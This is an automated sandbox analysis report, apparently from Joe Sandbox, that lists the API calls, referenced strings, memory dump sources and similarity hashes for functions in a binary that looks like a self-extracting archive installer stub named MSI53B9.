GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 0087F3A6
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0087F651
CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0087F669
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000000), ref: 0087F67B
ReadFile.KERNEL32(00000000,?,00007FFE,008A0858,00000000), ref: 0087F69A
CloseHandle.KERNEL32(00000000), ref: 0087F6F2
GetModuleFileNameW.KERNEL32(00000000,?,00000800), ref: 0087F708
CompareStringW.KERNEL32(00000400,00001001,008A08A4,?,DXGIDebug.dll,?,?,00000000,?,00000800), ref: 0087F762
GetFileAttributesW.KERNELBASE(?,?,008A0870,00000800,?,00000000,?,00000800), ref: 0087F78B
GetFileAttributesW.KERNEL32(?,?,008A0930,00000800), ref: 0087F7C4

Part of subcall function 0087F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0087F324
Part of subcall function 0087F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087DEC8,Crypt32.dll,?,0087DF4A,?,0087DF2E,?,?,?,?), ref: 0087F346

_swprintf.LIBCMT ref: 0087F834
_swprintf.LIBCMT ref: 0087F880

Part of subcall function 00873F5B: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 00873F6E

AllocConsole.KERNEL32 ref: 0087F888
GetCurrentProcessId.KERNEL32 ref: 0087F892
AttachConsole.KERNEL32(00000000), ref: 0087F899
GetStdHandle.KERNEL32(000000F4,?,00000000,?,00000000), ref: 0087F8BF
WriteConsoleW.KERNEL32(00000000), ref: 0087F8C6
Sleep.KERNEL32(00002710), ref: 0087F8D1
FreeConsole.KERNEL32 ref: 0087F8D7
ExitProcess.KERNEL32 ref: 0087F8DF

Strings

DXGIDebug.dll, xrefs: 0087F3E3, 0087F74E
SetDllDirectoryW, xrefs: 0087F37D
SetDefaultDllDirectories, xrefs: 0087F3A0
uxtheme.dll, xrefs: 0087F801
Please remove %s from %s folder. It is unsecure to run %s until it is done., xrefs: 0087F86E
dwmapi.dll, xrefs: 0087F40E, 0087F7F7
kernel32, xrefs: 0087F361

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: File$Console$HandleModule$AddressAttributesNameProcProcess_swprintf$AllocAttachCloseCompareCreateCurrentDirectoryExitFreeLibraryLoadPointerReadSleepStringSystemWrite__vswprintf_c_l
String ID: DXGIDebug.dll$Please remove %s from %s folder. It is unsecure to run %s until it is done.$SetDefaultDllDirectories$SetDllDirectoryW$dwmapi.dll$kernel32$uxtheme.dll
API String ID: 1201351596-3298887752
Opcode ID: 607563b7495a00e563d0cd868cf78d09be7ab2f4c2d0b9bed12827bb84391124
Instruction ID: 88612150b27f879f5077ca38e8366d0ff3096533b4d670c0980ef8dc4d07633d
Opcode Fuzzy Hash: 607563b7495a00e563d0cd868cf78d09be7ab2f4c2d0b9bed12827bb84391124
Instruction Fuzzy Hash: 66D16FB10083849AE720DFA18849B9FBAE8FB86344F50492DE398D6A51D7B4D50DCF67

Function 0087CED7 Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0087C88E: _wcschr.LIBVCRUNTIME ref: 0087C8BD

GetWindowRect.USER32(?,?), ref: 0087CF0E
GetClientRect.USER32(?,?), ref: 0087CF1A
GetWindowLongW.USER32(?,000000F0), ref: 0087CFBB
GetWindowRect.USER32(?,?), ref: 0087CFE8
GetWindowTextW.USER32(?,?,00000400), ref: 0087D007
SetWindowTextW.USER32(?,?), ref: 0087D02E
GetSystemMetrics.USER32(00000008), ref: 0087D036
GetWindow.USER32(?,00000005), ref: 0087D041
GetWindowTextW.USER32(00000000,?,00000400), ref: 0087D06C
SetWindowTextW.USER32(00000000,00000000), ref: 0087D099
GetWindowRect.USER32(00000000,?), ref: 0087D0AC
GetWindow.USER32(00000000,00000002), ref: 0087D11E

Strings

d, xrefs: 0087CF3A

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Window$RectText$ClientLongMetricsSystem_wcschr
String ID: d
API String ID: 4134264131-2564639436
Opcode ID: 16cb1f373a69b9753f4be03abdf09fb95e24d93f5cd75dd4560494030f915430
Instruction ID: 0bf6fbbe59dfb36d777174f9643e8b3738fea0a53cef8fdf0e5b61e9c3f5e7e8
Opcode Fuzzy Hash: 16cb1f373a69b9753f4be03abdf09fb95e24d93f5cd75dd4560494030f915430
Instruction Fuzzy Hash: 6A616E72208300AFD315DF69CD88E6BBBEAFB89714F44451DF684D2690D774E909CB62

Function 0088B70E Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 96
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetDlgItem.USER32(00000068,008C8958), ref: 0088B71D
ShowWindow.USER32(00000000,00000005,?,?,?,?,?,?,?,?,?,?,?,?,?,00889325), ref: 0088B748
SendMessageW.USER32(00000000,000000B1,00000000,000000FF), ref: 0088B757
SendMessageW.USER32(00000000,000000C2,00000000,008A02E4), ref: 0088B761
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088B777
SendMessageW.USER32(00000000,0000043A,00000000,?), ref: 0088B78D
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088B7CD
SendMessageW.USER32(00000000,000000C2,00000000,?), ref: 0088B7D7
SendMessageW.USER32(00000000,000000B1,05F5E100,05F5E100), ref: 0088B7E6
SendMessageW.USER32(00000000,00000444,00000001,0000005C), ref: 0088B809
SendMessageW.USER32(00000000,000000C2,00000000,008A1368), ref: 0088B814

Strings

\, xrefs: 0088B77D

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: MessageSend$ItemShowWindow
String ID: \
API String ID: 1207805008-2967466578
Opcode ID: beddab3abb73c7fc25cc9441997ada7e25bc1cc47545a1c5ee1c99fba6c2596b
Instruction ID: 3f858d3e6af98fa1d3bcc64d9830da70199bdebd6154fe8e51cb03d7e8a3deaf
Opcode Fuzzy Hash: beddab3abb73c7fc25cc9441997ada7e25bc1cc47545a1c5ee1c99fba6c2596b
Instruction Fuzzy Hash: 9721D0712857447BE311BB249C45FAB7B9CFF82754F000618FAA0E61D0D7A55A098BA7

Function 0088B9AA Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 179
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExW.SHELL32(000001C0), ref: 0088BAD8
ShowWindow.USER32(?,00000000,?,?,?,?,?,?,?), ref: 0088BB1D
GetExitCodeProcess.KERNEL32(?,?), ref: 0088BB55
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0088BB7B
ShowWindow.USER32(?,00000001,?,?,?,?,?,?,?), ref: 0088BC0A

Part of subcall function 00880B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0087AC49,?,?,?,0087ABF8,?,-00000002,?,00000000,?), ref: 00880B28

Strings

, xrefs: 0088BA2A
.inf, xrefs: 0088BA94
.exe, xrefs: 0088BB85

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ShowWindow$CloseCodeCompareExecuteExitHandleProcessShellString
String ID: $.exe$.inf
API String ID: 3686203788-2452507128
Opcode ID: 30a631c03982e4afa78e2d5bbec2a58ee1079a94b7a83c39badb4a78e5ab5485
Instruction ID: e033b91001b29f34f644b0022d5865810454a0f736ffcd78ee616e8faed16bf3
Opcode Fuzzy Hash: 30a631c03982e4afa78e2d5bbec2a58ee1079a94b7a83c39badb4a78e5ab5485
Instruction Fuzzy Hash: 4D51CD3050A7909AEB31BF64D940ABBBBE9FFC5314F04081DE4C1D32A5EBB19949CB52

Function 0087CACC Relevance: 12.5, APIs: 3, Strings: 4, Instructions: 258
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0087CAD1
_wcschr.LIBVCRUNTIME ref: 0087CAEF
GetModuleFileNameW.KERNEL32(00000000,?,00000800,?,?,?,0087CAB3,?), ref: 0087CB0A

Part of subcall function 008806E9: MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,?,?,?,?,0087B25B,00000000,?,?,?,?), ref: 00880705

Strings

R, xrefs: 0087CC21
*messages***, xrefs: 0087CBD6
a, xrefs: 0087CC2B
*messages***, xrefs: 0087CC0F

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ByteCharFileH_prologModuleMultiNameWide_wcschr
String ID: *messages***$*messages***$R$a
API String ID: 803915177-2900423073
Opcode ID: 2bb255bb5727d66ddf919c86bf6ee2ade0e38fdc7c62de203c04d8270622a56e
Instruction ID: 8bfe9a4a7a2fd1a22093de5237e4aee947e38a9bf54680d575403a979109bc21
Opcode Fuzzy Hash: 2bb255bb5727d66ddf919c86bf6ee2ade0e38fdc7c62de203c04d8270622a56e
Instruction Fuzzy Hash: 459123B1A002089ADB30EF68CC85BAEBBA4FF54314F14C56EE65DE7295DB70D984CB50

Function 008973AE Relevance: 9.2, APIs: 6, Instructions: 216
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

MultiByteToWideChar.KERNEL32(00000001,00000000,?,?,00000000,00000000,?,00892FC2,00892FC2,?,?,?,008975FF,00000001,00000001,F5E85006), ref: 00897408
MultiByteToWideChar.KERNEL32(00000001,00000001,?,?,00000000,?,?,?,?,008975FF,00000001,00000001,F5E85006,?,?,?), ref: 0089748E
WideCharToMultiByte.KERNEL32(00000001,00000000,00000000,00000000,?,F5E85006,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00897588
__freea.LIBCMT ref: 00897595

Part of subcall function 008959FC: RtlAllocateHeap.NTDLL(00000000,?,?,?,008923AA,?,0000015D,?,?,?,?,00892F29,000000FF,00000000,?,?), ref: 00895A2E

__freea.LIBCMT ref: 0089759E
__freea.LIBCMT ref: 008975C3

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ByteCharMultiWide__freea$AllocateHeap
String ID:
API String ID: 1414292761-0
Opcode ID: a8f347ffe2eb0b28df9c39eea8437db9cf6c2a256a851df023611b7a2f81e261
Instruction ID: 3dce29735da8719ca41b1f96b6ca1fe313daa27580e9b1f0458f6f0c725d4712
Opcode Fuzzy Hash: a8f347ffe2eb0b28df9c39eea8437db9cf6c2a256a851df023611b7a2f81e261
Instruction Fuzzy Hash: BE51C172624216AFEF25AF68CC41EBF7BA9FB44750F5A4629FC05D6150EB34DC40C6A0

Function 0087DEB5 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 20
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0087F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0087F324
Part of subcall function 0087F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087DEC8,Crypt32.dll,?,0087DF4A,?,0087DF2E,?,?,?,?), ref: 0087F346

GetProcAddress.KERNELBASE(00000000,CryptProtectMemory), ref: 0087DED4
GetProcAddress.KERNEL32(008B1E58,CryptUnprotectMemory), ref: 0087DEE4

Strings

CryptProtectMemory, xrefs: 0087DECE
Crypt32.dll, xrefs: 0087DEBE
CryptUnprotectMemory, xrefs: 0087DEDA

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AddressProc$DirectoryLibraryLoadSystem
String ID: Crypt32.dll$CryptProtectMemory$CryptUnprotectMemory
API String ID: 2141747552-1753850145
Opcode ID: d46a18e0ac5ac1e254d93ac1f3c1addfe9f21ff41be0504fe68be29facfb4ce3
Instruction ID: 5324410bb78fc489f1d9f9c93540171f0d2287a20a5f2ab26b2ecf9583112108
Opcode Fuzzy Hash: d46a18e0ac5ac1e254d93ac1f3c1addfe9f21ff41be0504fe68be29facfb4ce3
Instruction Fuzzy Hash: 53E04FB1500B43AEEB415B759808B06FBA4FF62714F14C515F068C3B55EBB8D0A89F50

Function 0087F9D1 Relevance: 7.5, APIs: 5, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0087FDC9: ResetEvent.KERNEL32(?,?,0087F9F3,00F6E8B8,?,008B1E74,00000000,0089F79B,000000FF,000001B8,0087FC8F,?,?,?,?,0087A5A0), ref: 0087FDE9
Part of subcall function 0087FDC9: ReleaseSemaphore.KERNEL32(?,?,00000000,?,?,?,?,0087A5A0,?,?,?,?,0089F79B,000000FF), ref: 0087FDFD

ReleaseSemaphore.KERNEL32(?,00000020,00000000), ref: 0087FA05
CloseHandle.KERNEL32(?,?), ref: 0087FA1F
DeleteCriticalSection.KERNEL32(?), ref: 0087FA38
FindCloseChangeNotification.KERNELBASE(?), ref: 0087FA44
CloseHandle.KERNEL32(?), ref: 0087FA50

Part of subcall function 0087FAC7: WaitForSingleObject.KERNEL32(?,000000FF,0087FD0B,?,?,0087FD80,?,?,?,?,?,0087FD6A), ref: 0087FACD
Part of subcall function 0087FAC7: GetLastError.KERNEL32(?,?,0087FD80,?,?,?,?,?,0087FD6A), ref: 0087FAD9

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: Close$HandleReleaseSemaphore$ChangeCriticalDeleteErrorEventFindLastNotificationObjectResetSectionSingleWait
String ID:
API String ID: 565839277-0
Opcode ID: d7414be931f82e75cbfc96d59e43c34d741b2c896a424a4d06c47f5f09e19524
Instruction ID: c9700941519f4cbf942108894d17023c5d4f538f2d59c516cfa4fa76cb2094fa
Opcode Fuzzy Hash: d7414be931f82e75cbfc96d59e43c34d741b2c896a424a4d06c47f5f09e19524
Instruction Fuzzy Hash: 92019E32000B44EFDB319B69DD84F86BBAAFB46711F008529F2AED2965CB716800CB21

Function 00888FC8 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetClassNameW.USER32(?,?,00000050), ref: 00888FDF
SHAutoComplete.SHLWAPI(?,00000010), ref: 00889016

Part of subcall function 00880B12: CompareStringW.KERNEL32(00000400,00001001,00000000,000000FF,?,000000FF,0087AC49,?,?,?,0087ABF8,?,-00000002,?,00000000,?), ref: 00880B28

FindWindowExW.USER32(?,00000000,EDIT,00000000), ref: 00889006

Strings

EDIT, xrefs: 00888FEA, 00888FF5, 00889002

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: AutoClassCompareCompleteFindNameStringWindow
String ID: EDIT
API String ID: 4243998846-3080729518
Opcode ID: fad653cf897de4de1e4ee08d62faf96decd7782eff6eabf150096ce37b5690e2
Instruction ID: 45de21eb989921775f4ab31de088c25de719b86d94e3c72cf9a026e01174abb6
Opcode Fuzzy Hash: fad653cf897de4de1e4ee08d62faf96decd7782eff6eabf150096ce37b5690e2
Instruction Fuzzy Hash: CEF0893260163867FB306A659C05FAB76ACFB46B11F080065FA40F2981D764AD01C7E6

Function 00889036 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
comCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0087F309: GetSystemDirectoryW.KERNEL32(?,00000800), ref: 0087F324
Part of subcall function 0087F309: LoadLibraryW.KERNELBASE(?,?,?,?,00000800,?,0087DEC8,Crypt32.dll,?,0087DF4A,?,0087DF2E,?,?,?,?), ref: 0087F346

OleInitialize.OLE32(00000000), ref: 0088904F
GdiplusStartup.GDIPLUS(?,?,00000000), ref: 00889086
SHGetMalloc.SHELL32(008B20E8), ref: 00889090

Strings

riched20.dll, xrefs: 0088903E

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: DirectoryGdiplusInitializeLibraryLoadMallocStartupSystem
String ID: riched20.dll
API String ID: 3498096277-3360196438
Opcode ID: b798f96f77eb3bbfc51bcb7af5dd44fcbdf1b9fa233fbbed80c8d56088bb83eb
Instruction ID: 62fb9a3436d9b0fa7a21919a42ed943dd2e12bf9f8dd662c0f002b9e57bca5c2
Opcode Fuzzy Hash: b798f96f77eb3bbfc51bcb7af5dd44fcbdf1b9fa233fbbed80c8d56088bb83eb
Instruction Fuzzy Hash: 06F04FB1C00119ABDB50AF9AD8499EEFFFCFF85300F00405AE814E2700D7B85605CBA2

Function 0088BE0A Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 32
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0088BE20
SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0088BE5C

Strings

sfxpar, xrefs: 0088BE57
sfxcmd, xrefs: 0088BE1B

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: EnvironmentVariable
String ID: sfxcmd$sfxpar
API String ID: 1431749950-3493335439
Opcode ID: ec525bac1c374405847cd0024671dade2a0313cbebbcefcc97820b2d4b8715ea
Instruction ID: 07f8c7a062b279241345a5447c89d4e5446ddd9b90e8809a655072a176480293
Opcode Fuzzy Hash: ec525bac1c374405847cd0024671dade2a0313cbebbcefcc97820b2d4b8715ea
Instruction Fuzzy Hash: D7F0A772801224AADB213F98DC0DAF67799FF09B51F004091FD88D6541DB649C40C7B1

Function 0087973D Relevance: 6.1, APIs: 4, Instructions: 99
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNELBASE(?,?,?,00000000,00000003,-00000001,00000000,?,00000000,?,?,0087777A,?,00000005,?,00000011), ref: 008797BD
GetLastError.KERNEL32(?,?,0087777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 008797CA
CreateFileW.KERNEL32(?,?,?,00000000,00000003,?,00000000,?,?,00000800,?,?,0087777A,?,00000005,?), ref: 008797FF
GetLastError.KERNEL32(?,?,0087777A,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 00879807

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: CreateErrorFileLast
String ID:
API String ID: 1214770103-0
Opcode ID: 55b8f79a6afaa98c199b87540ad2c6a54084b633a46b2c3ee7f89cd175e5d10d
Instruction ID: 1645c290221f9e78de94871949aaa0b8a6ea0c2609dfadeb37bb7804d7845ee8
Opcode Fuzzy Hash: 55b8f79a6afaa98c199b87540ad2c6a54084b633a46b2c3ee7f89cd175e5d10d
Instruction Fuzzy Hash: 073154708407456FE3209F248C45BE6BBA4FB46360F108629F9D4C72D1E375D888CBA1

Function 00879613 Relevance: 6.1, APIs: 4, Instructions: 57fileCOMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(000000F6), ref: 00879623
ReadFile.KERNELBASE(?,?,00000001,?,00000000), ref: 0087963B
GetLastError.KERNEL32 ref: 0087966D
GetLastError.KERNEL32 ref: 0087968C

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_870000_MSI53B9.jbxd

Similarity

API ID: ErrorLast$FileHandleRead
String ID:
API String ID: 2244327787-0
Opcode ID: dbbe08ce5a4a382117bfd14257348d086342cc84aeaf8ff83e1e0fb8d6338249
Instruction ID: b0613d9f3d3f0e7372fc1035863423e6d539831aac021e26e072bbbaa1580029
Opcode Fuzzy Hash: dbbe08ce5a4a382117bfd14257348d086342cc84aeaf8ff83e1e0fb8d6338249
Instruction Fuzzy Hash: E3117970500608EBDF209F65C804A6A77A9FB26335F10C62AF9EEC5298D73ACD40DF52

Function 008977D1 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,00000800,00892213,00000000,00000000,?,00897778,00892213,00000000,00000000,00000000,?,00897975,00000006,FlsSetValue), ref: 00897803
GetLastError.KERNEL32(?,00897778,00892213,00000000,00000000,00000000,?,00897975,00000006,FlsSetValue,008A3768,008A3770,00000000,00000364,?,008963F1), ref: 0089780F
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,00897778,00892213,00000000,00000000,00000000,?,00897975,00000006,FlsSetValue,008A3768,008A3770,00000000), ref: 0089781D

Memory Dump Source

Source File: 00000004.00000002.2492034715.0000000000871000.00000020.00000001.01000000.00000003.sdmp, Offset: 00870000, based on PE: true

Associated: 00000004.00000002.2492015599.0000000000870000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492065413.00000000008A0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008AA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492088778.00000000008CA000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000004.00000002.2492126451.00000000008CC000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

